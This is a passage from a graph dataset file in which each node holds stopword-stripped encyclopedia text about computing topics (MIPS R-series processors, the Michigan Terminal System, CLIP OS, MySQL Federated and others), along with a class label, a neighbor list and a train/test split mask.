xpl used xpl implement moderate-sized languages xpl used develop number compilers various languages systems xpl continues ported current computers x86/freebsd port done 2000 x86/linux port 2015 xpl c translator 2017",
    "neighbors": [
      512,
      2304,
      5635,
      4998,
      4492,
      8973,
      10508,
      1552,
      3350,
      5399,
      2168,
      7462,
      5677,
      8502,
      823,
      4409,
      10560,
      4548,
      1349,
      8262,
      8140,
      11599,
      7421,
      7775,
      6502,
      6248,
      7272,
      5484,
      2798,
      3960,
      3323,
      2172,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 6243,
    "label": 6,
    "text": "Fsn_(file_manager):fsn file manager file system navigator fsn pronounced fusion experimental application view file system 3d made sgi irix systems even though never developed fully functional file manager gained fame appearing movie jurassic park 1993 scene film character lex murphy played ariana richards finds computer displaying interface exclaims unix system know proceeds restart building access control system locking control room doors release film perceived visualization example media misrepresentation computers citing computer game-like display unrealistic hollywood mockup",
    "neighbors": [
      5380,
      5898,
      7311,
      5523,
      5397,
      5272,
      9762,
      7983,
      3764,
      823,
      11447,
      7234,
      10051,
      1860,
      6858,
      9932,
      5076,
      7001,
      221,
      5356,
      1398,
      1149
    ],
    "mask": "Test"
  },
  {
    "node_id": 6244,
    "label": 2,
    "text": "CLIP_OS:clip os clip os linux-based operating system created anssi national cybersecurity agency france aim produce hardened operating system secure sensitive information meets needs french administration clip os development since 2008 september 2018 anssi released two version clip os public stable version 4 in-development version 5 clip os based hardened gentoo variant gentoo linux developers noted whilst similar aims qubes os environment isolation mechanism different administrators clip os system able access user data unlike qubes-based system",
    "neighbors": [
      3082,
      5139,
      10780,
      10785,
      3618,
      6180,
      8242,
      9266,
      10817,
      6213,
      8268,
      5222,
      10856,
      4734,
      7812,
      8326,
      4238,
      10382,
      2195,
      2711,
      9882,
      1694,
      2723,
      10933,
      5815,
      5822,
      1736,
      2762,
      8909,
      8410,
      10971,
      8928,
      1761,
      2278,
      233,
      4841,
      10482,
      2294,
      8439,
      2809,
      7938,
      4360,
      1813,
      792,
      10016,
      295,
      7983,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      11155,
      9621,
      8602,
      11678,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      9646,
      9660,
      457,
      5067,
      8147,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      8186,
      2044,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 6245,
    "label": 1,
    "text": "MySQL_Federated:mysql federated mysql federated storage engine mysql relational database management system storage engine allows user create table local representation foreign remote table utilizes mysql client library api data transport treating remote data source way storage engines treat local data sources whether myd files myisam memory cluster heap tablespace innodb federated table defined one .frm data definition file containing information url data source actual data exist local remote mysql instance create federated table one specify url connection string connection url format upon creation federated table user must ensure remote data source indeed exist error issued mysql federated storage engine authored patrick galbraith brian aker currently maintained patrick galbraith antony curtis introduced 2005 mysql 5.0",
    "neighbors": [
      11392,
      8195,
      6797,
      10258,
      7453,
      1950,
      9503,
      7339,
      7983,
      9010,
      823,
      6721,
      7234,
      5964,
      5198,
      7506,
      9687,
      10459,
      8295,
      8683,
      5356,
      2413,
      7022,
      3188,
      5492,
      4598,
      1399,
      10873,
      2810,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 6246,
    "label": 4,
    "text": "MailChannels:mailchannels mailchannels privately held anti-spam technology company based vancouver british columbia mailchannels specializes software services detect block sending spam phishing abusive email unlike anti-spam technology providers mailchannels positions leader blocking abusive email source installing software services within sending networks services isps web hosting providers combat outgoing spam mailchannels offers customers either cloud-based smtp relay service software installed customer within network mailchannels software derives open-source web proxy software nginx company makes claim software extremely scalable robust mailchannels customers include large web hosting companies internet service providers mailbox providers email service providers endurance international group sendgrid sherweb locaweb company founded 2004 former engineers activestate acquired sophos created one first commercial spam filters company first product smtp proxy provides tar-pitting transparent smtp proxy functionality inbound email filtering 2007 mit spam conference company founder ken simpson awarded best paper award 2007 mailchannels joined maawg closed series round led current former microsoft employees 2010 company launched outbound email filtering software claims capable filtering 30 millions messages per hour transparently network outbound email filtering involves scanning email traffic exits network identifying compromised accounts reducing risk ip addresses blocked receiving networks 2013 company launched outbound spam filtering service 2016 company launched reseller program 2018 company launch inbound spam filtering service",
    "neighbors": [
      9824,
      4194,
      3237,
      10696,
      6762,
      4272,
      467,
      9053,
      2558,
      9055
    ],
    "mask": "Test"
  },
  {
    "node_id": 6247,
    "label": 3,
    "text": "R10000:r10000 r10000 code-named t5 risc microprocessor implementation mips iv instruction set architecture isa developed mips technologies inc. mti division silicon graphics inc. sgi chief designers chris rowen kenneth c. yeager r10000 microarchitecture known andes abbreviation architecture non-sequential dynamic execution scheduling r10000 largely replaces r8000 high-end r4400 elsewhere mti fabless semiconductor company r10000 fabricated nec toshiba previous fabricators mips microprocessors integrated device technology idt three others fabricate r10000 expensive r4000 r4400 r10000 introduced january 1996 clock frequencies 175 mhz 195 mhz 150 mhz version introduced o2 product line 1997 discontinued shortly due customer preference 175 mhz version r10000 available large volumes later year due fabrication problems mips foundries 195 mhz version short supply throughout 1996 priced us 3,000 result 25 september 1996 sgi announced r10000s fabricated nec march end july year faulty drawing much current causing systems shut operation sgi recalled 10,000 r10000s shipped systems result impacted company earnings 1997 version r10000 fabricated 0.25 µm process enabled microprocessor reach 250 mhz users r10000 include r10000 four-way superscalar design implements register renaming executes instructions out-of-order design departure previous mti microprocessors r4000 much simpler scalar in-order design relies largely high clock rates performance r10000 fetches four instructions every cycle instruction cache instructions decoded placed integer floating-point load/store instruction queues depending type instruction decode unit assisted pre-decoded instructions instruction cache append five bits every instruction enable unit quickly identify execution unit instruction executed rearrange format instruction optimize decode process instruction queues accept four instructions decoder avoiding bottlenecks instruction queues issue instructions execution units dynamically depending availability operands resources queues except load/store queue issue two instructions every cycle execution units load/store queue issue one instruction r10000 thus issue five instructions every cycle integer unit consists integer register file three pipelines two integer one load store integer register file 64 bits wide contains 64 entries 32 architectural registers 32 rename registers implement register renaming register file seven read ports three write ports integer pipelines adder logic unit however first pipeline barrel shifter hardware confirming prediction conditional branches second pipeline used access multiplier divider multiplies pipelined six-cycle latency 32-bit integers ten 64-bit integers division pipelined divider uses non-restoring algorithm produces one bit per cycle latencies 32-bit 64-bit divides 35 67 cycles respectively floating-point unit fpu consists four functional units adder multiplier divide unit square root unit adder multiplier pipelined divide square root units adds multiplies latency three cycles adder multiplier accept new instruction every cycle divide unit 12- 19-cycle latency depending whether divide single precision double precision respectively square root unit executes square root reciprocal square root instructions square root instructions 18- 33-cycle latency single precision double precision respectively new square root instruction issued divide unit every 20 35 cycles single precision double precision respectively reciprocal square roots longer latencies 30 52 cycles single precision 32-bit double precision 64-bit respectively floating-point register file contains sixty-four 64-bit registers thirty-two architectural remaining rename registers adder dedicated read write ports whereas multiplier shares divider square root unit divide square root units use srt algorithm mips iv isa multiply–add instruction instruction implemented r10000 bypass — result multiply bypass register file delivered add pipeline operand thus fused multiply–add four-cycle latency r10000 two comparatively large on-chip caches 32 kb instruction cache 32 kb data cache instruction cache two-way set-associative 128-byte line size instructions partially decoded appending four bits instruction length 32 bits placed cache 32 kb data cache dual-ported two-way interleaving consists two 16 kb banks bank two-way set-associative cache 64-byte lines uses write-back protocol virtually indexed physically tagged enable cache indexed clock cycle maintain coherency secondary cache external secondary unified cache supported capacities 512 kb 16 mb implemented commodity synchronous static random access memorys ssrams cache accessed via 128-bit bus protected 9-bits error correcting code ecc cache bus operate clock rate r10000 whose maximum frequency 200 mhz 200 mhz bus yielded peak bandwidth 3.2 gb/s cache two-way set associative avoid high pin count r10000 predicts way accessed mips iv 64-bit architecture reduce cost r10000 implement entire physical virtual address instead 40-bit physical address 44-bit virtual address thus capable addressing 1 tb physical memory 16 tb virtual memory r10000 uses avalanche bus 64-bit bus operates frequencies 100 mhz avalanche multiplexed address data bus 100 mhz yields maximum theoretical bandwidth 800 mb/s peak bandwidth 640 mb/s requires cycles transmit addresses system interface controller supports glue-less symmetrical multiprocessing smp four microprocessors systems using r10000 external logic scale hundreds processors example system origin 2000 r10000 consists approximately 6.8 million transistors approximately 4.4 million contained primary caches die measures 16.640 17.934 mm die area 298.422 mm fabricated 0.35 µm process packaged 599-pad ceramic land grid array lga r10000 introduced microprocessor report covering 1994 microprocessor forum reported packaged 527-pin ceramic pin grid array cpga vendors also investigated possibility using 339-pin multi-chip module mcm containing microprocessor die 1 mb cache r10000 extended multiple successive derivatives derivatives r12000 clock frequency kept low possible maintain power dissipation 15 20 w range densely packaged sgi high performance computing hpc systems r12000 derivative r10000 started mips completed sgi fabricated nec toshiba version fabricated nec called vr12000 microprocessor introduced november 1998 available 270 300 360 mhz r12000 developed stop-gap solution following cancellation beast project intended deliver successor r10000 r12000 users include nec siemens-nixdorf sgi tandem computers later compaq acquisition tandem r12000 improves upon r10000 microarchitecture inserting extra pipeline stage improve clock frequency resolving critical path increasing number entries branch history table improving prediction modifying instruction queues take account age queued instruction enabling older instructions executed newer ones possible r12000 fabricated nec toshiba 0.25 µm cmos process four levels aluminum interconnect new use new process mean r12000 simple die shrink tweaked microarchitecture layout die optimized take advantage 0.25 µm process nec fabricated vr12000 contained 7.15 million transistors measured 15.7 14.6 mm 229.22 mm r12000a derivative r12000 developed sgi introduced july 2000 operates 400 mhz fabricated nec 0.18 µm process aluminum interconnects r14000 development r12000 announced july 2001 r14000 operates 500 mhz enabled 0.13 µm cmos process five levels copper interconnect fabricated features improvements microarchitecture r12000 supporting double data rate ddr ssrams secondary cache 200 mhz system bus r14000a development r14000 announced february 2002 operates 600 mhz dissipates approximately 17 w fabricated nec corporation 0.13 µm cmos process seven levels copper interconnect r16000 code-named n0 last derivative r10000 developed sgi fabricated nec 0.11 µm process eight levels copper interconnect microprocessor introduced 9 january 2003 debuting 700 mhz fuel also used onyx4 ultimate vision april 2003 600 mhz version introduced origin 350 improvements 64 kb instruction data caches r16000a refers r16000 microprocessors clock rates higher 700 mhz first r16000a 800 mhz version introduced 4 february 2004 later 900 mhz version introduced version time fastest publicly known r16000a—sgi later revealed 1.0 ghz r16000s shipped selected customers r16000 users include hp sgi sgi uses microprocessor fuel tezro workstations origin 3000 servers supercomputers hp uses r16000a nonstop himalaya s-series fault-tolerant servers inherited tandem via compaq r18000 canceled development r10000 microarchitecture featured major improvements silicon graphics inc. described hot chips symposium 2001 r18000 designed specifically sgi ccnuma servers supercomputers node would two r18000s connected via multiplexed bus system controller would interface microprocessors local memory rest system via hypercube network r18000 improved floating-point instruction queues revised floating-point unit feature two multiply–add units quadrupling peak flops count division square-root would performed separate non-pipelined units parallel multiply–add units system interface memory hierarchy also significantly reworked would 52-bit virtual address 48-bit physical address bidirectional multiplexed address data system bus earlier models would replaced two unidirectional ddr links 64-bit multiplexed address write path 128-bit read path paths could shared another r18000 multiplexing bus could also configured sysad avalanche configuration backwards compatibility r10000 systems r18000 would 1 mb four-way set-associative secondary cache included on-die supplemented optional tertiary cache built single data rate sdr double data rate ddr ssram ddr sdram capacities 2 64 mb l3 cache would cache tags equivalent 400 kb located on-die reduce latency l3 cache would accessed via 144-bit bus 128 bits data 16 bits ecc l3 cache clock rate would programmable r18000 fabricated nec ux5 process 0.13 µm cmos process nine levels copper interconnect would used 1.2 v power supply dissipated less heat contemporary server microprocessors order densely packed systems",
    "neighbors": [
      4098,
      8327,
      8711,
      398,
      783,
      3470,
      6926,
      11539,
      7445,
      9851,
      4124,
      6815,
      8481,
      8355,
      5028,
      8229,
      6057,
      426,
      938,
      8237,
      2994,
      1461,
      7093,
      7234,
      10051,
      1606,
      1480,
      10316,
      8143,
      5076,
      221,
      3175,
      6247,
      7911,
      6250,
      6252,
      6253,
      5358,
      4079,
      6256,
      10734,
      5237,
      3702,
      760,
      3451
    ],
    "mask": "Test"
  },
  {
    "node_id": 6248,
    "label": 2,
    "text": "Michigan_Terminal_System:michigan terminal system michigan terminal system mts one first time-sharing computer operating systems developed 1967 university michigan use ibm s/360-67 s/370 compatible mainframe computers developed used consortium eight universities united states canada united kingdom period 33 years 1967 1999 university michigan multiprogramming supervisor ummps developed staff academic computing center university michigan operation ibm s/360-67 s/370 compatible computers software may described multiprogramming multiprocessing virtual memory time-sharing supervisor runs multiple resident reentrant programs among programs michigan terminal system mts command interpretation execution control file management accounting end-users interact computing resources mts using terminal batch server oriented facilities name mts refers mts used production basis 13 sites united states canada united kingdom brazil possibly yugoslavia several sites trial benchmarking basis mts developed maintained core group eight universities included mts consortium university michigan announced 1988 reliable mts service provided long users requiring ... mts may phased alternatives able meet users computing requirements ceased operating mts end-users june 30 1996 time services moved client/server-based computing systems typically unix servers various mac pc unix flavors clients university michigan shut mts system last time may 30 1997 rensselaer polytechnic institute rpi believed last site use mts production environment rpi retired mts june 1999 today mts still runs using ibm s/370 emulators hercules sim390 flex-es mid-1960s university michigan providing batch processing services ibm 7090 hardware control university michigan executive system umes interested offering interactive services using time-sharing time work computers could perform limited small real memory capacity ibm introduced system/360 family computers mid-1960s provide solution limitation within ibm conflicting views importance need support time-sharing paper titled program addressing structure time-sharing environment bruce arden bernard galler frank westervelt associate directors um academic computing center tom o'brian building upon basic ideas developed massachusetts institute technology mit published january 1966 paper outlined virtual memory architecture using dynamic address translation dat could used implement time-sharing year negotiations design studies ibm agreed make one-of-a-kind version s/360-65 mainframe computer dynamic address translation dat features would support virtual memory accommodate um desire support time-sharing computer dubbed model s/360-65m stood michigan ibm initially decided supply time-sharing operating system machine meanwhile number institutions heard project including general motors massachusetts institute technology mit lincoln laboratory princeton university carnegie institute technology later carnegie mellon university intrigued time-sharing idea expressed interest ordering modified ibm s/360 series machines demonstrated interest ibm changed computer model number s/360-67 made supported product requests 100 new model s/360-67s ibm realized market time-sharing agreed develop new time-sharing operating system called tss/360 tss stood time-sharing system delivery roughly time first model s/360-67 waiting model 65m arrive um computing center personnel able perform early time-sharing experiments using ibm system/360 model 50 funded arpa concomp conversational use computers project time-sharing experiment began half-page code written kitchen table combined small multi-programming system llmps mit lincoln laboratory modified became um multi-programming supervisor ummps turn ran mts job program earliest incarnation mts intended throw-away system used gain experience new ibm s/360 hardware would discarded ibm tss/360 operating system became available development tss took longer anticipated delivery date delayed yet available s/360-67 serial number 2 arrived computing center january 1967 time um decide whether return model 67 select another mainframe develop mts interim system use tss ready decision continue development mts staff moved initial development work model 50 model 67 tss development eventually canceled ibm reinstated canceled time um liked system developed longer considered interim mts would used um sites 33 years mts developed maintained used consortium eight universities us canada united kingdom several sites ran one mts system numac ran two first newcastle later durham michigan ran three mid-1980s um maize ub blue hg human genetics ubc ran three four different times mts-g mts-l mts-a mts-i general library administration instruction mts sites made contributions development mts sometimes taking lead design implementation new feature times refining enhancing critiquing work done elsewhere many mts components work multiple people multiple sites early days collaboration mts sites accomplished combination face-to-face site visits phone calls exchange documents magnetic tapes snail mail informal get-togethers share meetings later e-mail computer conferencing using confer *forum network file transfer e-mail attachments supplemented eventually largely replaced earlier methods members mts consortium produced series 82 mts newsletters 1971 1982 help coordinate mts development starting ubc 1974 mts consortium held annual mts workshops one member sites workshops informal included papers submitted advance proceedings published after-the-fact included session summaries mid-1980s several western workshops held participation subset mts sites ubc sfu uqv um possibly rpi annual workshops continued even mts development work began taper called simply community workshop continued mid-1990s share expertise common experiences providing computing services even though mts longer primary source computing campuses stopped running mts entirely addition eight mts consortium sites involved development mts run number sites including copy mts also sent university sarajevo yugoslavia though whether ever installed known inria french national institute research computer science control grenoble france ran mts trial basis university waterloo ontario canada southern illinois university naval postgraduate school amdahl corporation st systems mcgill university hospitals stanford university university illinois united states sites theory mts run ibm s/360-67 ibm s/370 series successors mts run following computers production benchmarking trial configurations university michigan installed ran mts first ibm s/360-67 outside ibm serial number 2 1967 second amdahl 470v/6 serial number 2 1975 first amdahl 5860 serial number 1 1982 first factory shipped ibm 3090-400 1986 numac ran mts first s/360-67 uk likely first europe university british columbia ubc took lead converting mts run ibm s/370 series ibm s/370-168 1974 university alberta installed first amdahl 470v/6 canada serial number p5 1975 1978 numac university newcastle upon tyne university durham moved main mts activity ibm s/370 series ibm s/370-168 mts designed support four processors ibm s/360-67 although ibm produced one simplex half-duplex two duplex processor configurations model 67 1984 rpi updated mts support 32 processors ibm s/370-xa extended addressing hardware series although 6 processors likely largest configuration actually used mts supports ibm vector facility available option ibm 3090 es/9000 systems early 1967 running single processor ibm s/360-67 um without virtual memory support mts typically supporting 5 simultaneous terminal sessions one batch job november 1967 virtual memory support added mts running ibm s/360-67 simultaneously supporting 50 terminal sessions 5 batch jobs august 1968 dual processor ibm s/360-67 replaced single processor system supporting roughly 70 terminal 8 batch jobs late 1991 mts um running ibm es/9000-720 supporting 600 simultaneous terminal sessions 3 8 batch jobs mts ipl-ed vm/370 mts sites ran mts native hardware without using virtual machine notable features mts include following notable programs developed mts following notable programs ported mts systems mts supports rich set programming languages developed mts others ported systems ummps supervisor complete control hardware manages collection job programs one job programs mts job program users interact mts operates collection command language subsystems clss one clss allows execution user programs mts provides collection system subroutines available clss user programs mts among things system subroutines provide standard access device support routines dsrs components perform device dependent input/output lists follow quite university michigan centric mts sites used material also produced manuals memos reports newsletters tailored needs site manual series mts michigan terminal system published 1967 1991 volumes 1 23 updated reissued irregularly initial releases volumes always occur numeric order volumes occasionally changed names updated republished general higher number specialized volume earliest versions mts volume ii different organization content mts volumes followed included internal well end user documentation second edition december 1967 covered following mts volumes published university michigan computing center available pdfs various aspects mts university michigan documented series computing center memos ccmemos published irregularly 1967 1987 numbered 2 924 though necessarily chronological order numbers 2 599 general memos various software hardware 600 series consultant notes series—short memos beginning intermediate users 800 series covers issues relating xerox 9700 printer text processing typesetting 900 series covers microcomputers 700 series 1989 series continued reference memos less focus mts long run newsletters targeted end-users university michigan titles computing center news computing center newsletter u-m computing news information technology digest published starting 1971 also introductory material presented user guide mts user guide tutorial series including following materials widely distributed included mts distributions university michigan released mts magnetic tape irregular basis full partial distributions full distributions d1.0 d2.0 ... included mts components partial distributions d1.1 d1.2 d2.1 d2.2 ... included components changed since last full partial distribution distributions 1.0 3.1 supported ibm s/360 model 67 distribution 3.2 supported ibm s/360-67 ibm s/370 architecture distributions d4.0 d6.0 supported ibm s/370 architecture extensions mts distributions included updates needed run licensed program products proprietary software mts base proprietary software obtained separately owners except ibm assembler h none licensed programs required run mts last mts distribution d6.0 released april 1988 consisted 10,003 files six 6250 bpi magnetic tapes 1988 distribution mts components done ad hoc fashion using network file transfer allow new sites get started scratch two additional magnetic tapes made available iplable boot tape contained minimalist version mts plus dasdi diskcopy utilities could used initialize restore one disk pack starter version mts second magnetic tape earliest days mts standalone tss dasdi dump/restore utilities rather mts used create one-disk starter system also less formal redistributions individual sites would send magnetic tapes containing new updated work coordinating site site would copy material common magnetic tape rd1 rd2 ... send copies tape sites contents redistribution tapes seem lost today complete materials six full ten partial mts distributions well two redistributions created 1968 1988 available bitsavers software archive university michigan deep blue digital archive working d6.0 distribution materials possible create iplable version mts new d6.0a distribution mts makes easier d6.0a based d6.0 version mts 1988 various fixes updates make operation hercules 2012 smoother future iplable version mts made available based upon version mts use university michigan 1996 shortly mts shut december 22 2011 mts distribution materials freely available terms creative commons attribution 3.0 unported license cc 3.0 earliest days mts made available free without need license sites interested running mts seemed knowledgeable staff required support mid-1980s licensing arrangements formalized university michigan acting agent granting licenses behalf mts consortium mts licenses available academic organizations annual fee 5,000 non-profit organizations 10,000 commercial organizations 25,000 license restricted mts used provide commercial computing services licensees received copy full set mts distribution tapes incremental distributions prepared year written installation instructions two copies current user documentation limited amount assistance organizations licensed mts several licensed mts order run single program confer fees collected used offset common expenses mts consortium",
    "neighbors": [
      6529,
      2179,
      4996,
      10883,
      5384,
      10508,
      7053,
      8077,
      9361,
      7186,
      6675,
      7187,
      789,
      5397,
      9468,
      11539,
      11673,
      9370,
      6557,
      3359,
      9762,
      421,
      9126,
      7848,
      11075,
      1323,
      7983,
      8879,
      7217,
      10803,
      7477,
      7733,
      8502,
      10040,
      5562,
      573,
      1219,
      8388,
      1349,
      6342,
      8262,
      840,
      2813,
      5450,
      1611,
      8136,
      8524,
      10568,
      10569,
      1235,
      7507,
      2901,
      2519,
      5336,
      2395,
      2652,
      477,
      863,
      10848,
      6242,
      868,
      3429,
      6502,
      8421,
      9829,
      11236,
      8900,
      2798,
      2804,
      5492,
      2168,
      2811,
      2172,
      2045,
      8063
    ],
    "mask": "Test"
  },
  {
    "node_id": 6249,
    "label": 9,
    "text": "Modelling_of_General_Systems:modelling general systems mgs general model simulation domain-specific language used specification simulation dynamical systems dynamical structure developed ibisc computer science integrative biology complex systems université d'évry val-d'essonne university évry mgs particularly aimed modelling biological systems mgs computational model generalisation cellular automata lindenmayer systems paun systems computational formalisms inspired chemistry biology manipulates collections sets positions filled values lattice user-defined topology",
    "neighbors": [
      9926,
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 6250,
    "label": 3,
    "text": "R3000:r3000 r3000 32-bit risc microprocessor chipset developed mips computer systems implemented mips instruction set architecture isa introduced june 1988 second mips implementation succeeding r2000 flagship mips microprocessor operated 20 25 33.33 mhz mips 1 instruction set small compared contemporary 80x86 680x0 architectures encoding commonly-used operations supporting addressing modes combined fixed instruction length three different types instruction formats simplified instruction decoding processing employed 5-stage instruction pipeline enabling execution rate approaching one instruction per cycle unusual time mips generation supports four co-processors addition cpu core r3000 microprocessor includes control processor cp contains translation lookaside buffer memory management unit cp works coprocessor besides cp r3000 also support external r3010 numeric coprocessor two external coprocessors r3000 cpu include level 1 cache instead on-chip cache controller operates external data instruction caches 256 kb access caches clock cycle r3000 found much success used many companies workstations servers users included r3000 also used embedded microprocessor advances technology rendered obsolete high-performance systems found continued use lower-cost designs companies lsi logic developed derivatives r3000 specifically embedded systems r3000 development r2000 minor improvements including larger tlb faster bus external caches r3000 die contained 115,000 transistors measured 75,000 square mils 48 mm mips fabless semiconductor company r3000 fabricated mips partners including integrated device technology idt lsi logic nec corporation performance semiconductor others fabricated 1.2 µm complementary metal–oxide–semiconductor cmos process two levels aluminium interconnect derivatives r3000 non-embedded applications include derivatives r3000 embedded applications include",
    "neighbors": [
      9857,
      4098,
      8327,
      8711,
      7561,
      3597,
      783,
      6415,
      8976,
      7954,
      7445,
      921,
      9851,
      4124,
      8481,
      8355,
      5028,
      6821,
      8231,
      6057,
      426,
      938,
      9003,
      8237,
      9391,
      7234,
      10051,
      1606,
      2503,
      1480,
      6854,
      9932,
      10316,
      2525,
      1376,
      6247,
      2155,
      6252,
      6253,
      5358,
      10734,
      6256,
      5873,
      5237,
      760,
      7801,
      3451,
      639
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6251,
    "label": 2,
    "text": "Talking_Moose:talking moose talking moose animated talking utility apple macintosh created 1986 canadian programmer steven halls first animated talking agent personal computer featured moose would appear periodic intervals joke witticism moose would also comment system events user actions could speak user typed using moose proof desk accessory according halls original purpose moose make use mac macintalk text-to-speech engine novel manner doonesbury strip characters commented talking computer provided inspiration halls found moose head antlers recognizable even low-resolution computer screens moose first facially animated talking agent lip synchronization became seed idea future talking agents clippy paperclip microsoft windows bonzi buddy prody parrot creative soundblaster talking moose used apple macintalk software first version famously made original never trust computer ca n't lift speech macintosh launch 1984 apple development macintalk petered granted halls permission use continue refining software free halls improve fluidity speech reliability interpretation gave moose library comedic observations wisecracks gave distinctive character around 1990 version talking moose software commercially published baseline publishing commercial release talking moose included color graphics additional software allowed users create edit phrases spoken stripped-down version baseline release talking moose distributed bob levitus book stupid mac tricks 1989 1990s moose rewritten uli kusterer name uli moose later obtained steve halls blessing moose included bob levitus imac ibook book n't know could version 1.0 talking moose released 1986 steve halls version 2.0 released 1987 ran macintosh systems 6.0.4 7.1 macintalk voice used moose 'fred around 1990 baseline publishing commercially published talking moose released version 4 introducing new characters cartoon carnival supposedly run titular ungulate uli kusterer next author moose got rid cartoon carnival worked spirit original moose releasing new versions starting 1.0 supported mac os 7.1 9.2 released initially compuserve later internet also developed first os x native version v 3.0 latest macintosh version moose v3.5.7 works versions os x 10.3 10.7 includes universal binaries january 8 2009 talking moose posting periodic comments twitter account",
    "neighbors": [
      3533,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 6252,
    "label": 3,
    "text": "R4000:r4000 r4000 microprocessor developed mips computer systems implements mips iii instruction set architecture isa officially announced 1 october 1991 one first 64-bit microprocessors first mips iii implementation early 1990s risc microprocessors expected replace cisc microprocessors intel i486 r4000 selected microprocessor advanced computing environment ace industry standard intended define common risc platform ace ultimately failed number reasons r4000 found success workstation server markets three configurations r4000 r4000pc entry-level model support secondary cache r4000sc model secondary cache multiprocessor capability r4000mc model secondary cache support cache coherency protocols required multiprocessor systems r4000 scalar superpipelined microprocessor eight-stage integer pipeline first stage virtual address instruction generated instruction translation lookaside buffer tlb begins translation address physical address second stage translation completed instruction fetched internal 8 kb instruction cache instruction cache direct-mapped virtually indexed physically tagged 16- 32-byte line size architecturally could expanded 32 kb third stage rf instruction decoded register file read mips iii defines two register files one integer unit floating-point register file 64 bits wide contained 32 entries integer register file two read ports one write port floating-point register file two read ports two write ports execution begins stage four ex integer floating-point instructions written back register files completed stage eight wb results may bypassed possible r4000 arithmetic logic unit alu shifter multiplier divider load aligner executing integer instructions alu consists 64-bit carry-select adder logic unit pipelined shifter 32-bit barrel shifter performs 64-bit shifts two cycles stalling pipeline result design chosen save die area multiplier divider pipelined significant latencies multiplies 10- 20-cycle latency 32-bit 64-bit integers respectively whereas divides 69- 133-cycle latency 32-bit 64-bit integers respectively instructions single cycle latency alu adder also used calculating virtual addresses loads stores branches load store instructions executed integer pipeline access on-chip 8 kb data cache r4000 on-die ieee 754-1985-compliant floating-point unit fpu referred r4010 fpu coprocessor designated cp1 mips isa defined four coprocessors designated cp0 cp3 fpu operate two modes 32- 64-bit selected setting bit fr bit cpu status register 32-bit mode 32 floating-point registers become 32 bits wide used hold single-precision floating-point numbers used hold double-precision numbers 16 floating-point registers registers paired fpu operate parallel alu unless data resource dependency causes stall contains three sub-units adder multiplier divider multiplier divider execute instruction parallel adder use adder final stages execution thus imposing limits overlapping execution thus certain conditions execute three instructions time one unit fpu capable retiring one instruction per cycle adder multiplier pipelined multiplier four-stage multiplier pipeline clocked twice clock frequency microprocessor adequate performance uses dynamic logic achieve high clock frequency division 23- 36-cycle latency single- double-precision operations square-root 54- 112-cycle latency division square-root uses srt algorithm memory management unit mmu uses 48-entry translation lookaside buffer translate virtual addresses r4000 uses 64-bit virtual address implements 40 64-bits 1 tb virtual memory remaining bits checked ensure contain zero r4000 uses 36-bit physical address thus able address 64 gb physical memory r4000 sc mc configurations supports external secondary cache capacity 128 kb 4 mb cache accessed via dedicated 128-bit data bus secondary cache configured either unified cache split instruction data cache latter configuration cache capacity 128 kb 2 mb secondary cache physically indexed physically tagged programmable line size 128 256 512 1,024 bytes cache controller on-die cache built standard static random access memory sram data tag buses ecc-protected r4000 uses 64-bit system bus called sysad bus sysad bus address data multiplexed bus used set wires transfer data addresses reduces bandwidth also less expensive providing separate address bus requires pins increases complexity system sysad bus configured operate half third quarter internal clock frequency sysad bus generates clock signal dividing operating frequency r4000 contains 1.2 million transistors designed 1.0 µm two-layer metal complementary metal–oxide–semiconductor cmos process mips fabless company r4000 fabricated partners processes 0.8 µm minimum feature size r4000 generates various clock signals master clock signal generated externally operating frequency r4000 multiplies master clock signal two use on-die phase-locked loop pll r4000pc packaged 179-pin ceramic pin grid array cpga r4000sc r4000mc packaged 447-pin ceramic staggered pin grid array spga pin r4000mc different r4000sc pins unused r4000sc used signals implement cache coherency r4000mc pin-out r4000pc similar pga-packaged r4200 r4600 microprocessors characteristic enables properly designed system use three microprocessors r4400 development r4000 announced early november 1992 samples microprocessor shipped selected customers general availability january 1993 r4400 operates higher clock frequencies 100 133 150 200 250 mhz major improvement r4000 larger primary caches doubled capacity 16 kb 8 kb contained 2.3 million transistors r4400 licensed integrated device technology idt lsi logic nec performance semiconductor siemens ag toshiba idt nec siemens toshiba fabricated marketed microprocessor lsi logic used r4400 custom products performance semiconductor sold logic division cypress semiconductor mips microprocessor products discontinued nec marketed version vr4400 first version 150 mhz part announced november 1992 early versions fabricated 0.6 µm process mid-1995 250 mhz part began sampling fabricated 0.35 µm four-layer-metal process nec also produced mr4401 ceramic multi-chip module mcm contained vr4400sc ten 1 mbit sram chips implemented 1 mb secondary cache mcm pin-compatible r4x00pc first version 150 mhz part announced 1994 1995 200 mhz part announced toshiba marketed version tc86r4400 200 mhz part containing 2.3 million transistors measuring 134 mm fabricated 0.3 µm process introduced mid-1994 r4400pc priced 1,600 r4400sc 1,950 r4400mc 2,150 quantities 10,000 r4400 used r4000 r4400 require external core logic interface system commercially available proprietary core logic developed microprocessors proprietary designs developed system vendors sgi use systems commercial chipsets developed acer mips microprocessors fabricators nec toshiba acer developed pica chipset toshiba developed tiger shark chipset adapted sysad bus i486-compatible system bus",
    "neighbors": [
      4098,
      6791,
      8327,
      8711,
      783,
      8976,
      11539,
      2452,
      7445,
      2071,
      9851,
      4124,
      8481,
      8355,
      4516,
      5028,
      8229,
      8231,
      6057,
      426,
      938,
      8237,
      7215,
      11058,
      1461,
      7093,
      7234,
      10051,
      1606,
      6854,
      1480,
      10316,
      6879,
      3175,
      6247,
      7911,
      3818,
      6250,
      6252,
      6253,
      5358,
      10734,
      6256,
      4465,
      5873,
      5237,
      630,
      3702,
      760,
      3451,
      639
    ],
    "mask": "Train"
  },
  {
    "node_id": 6253,
    "label": 3,
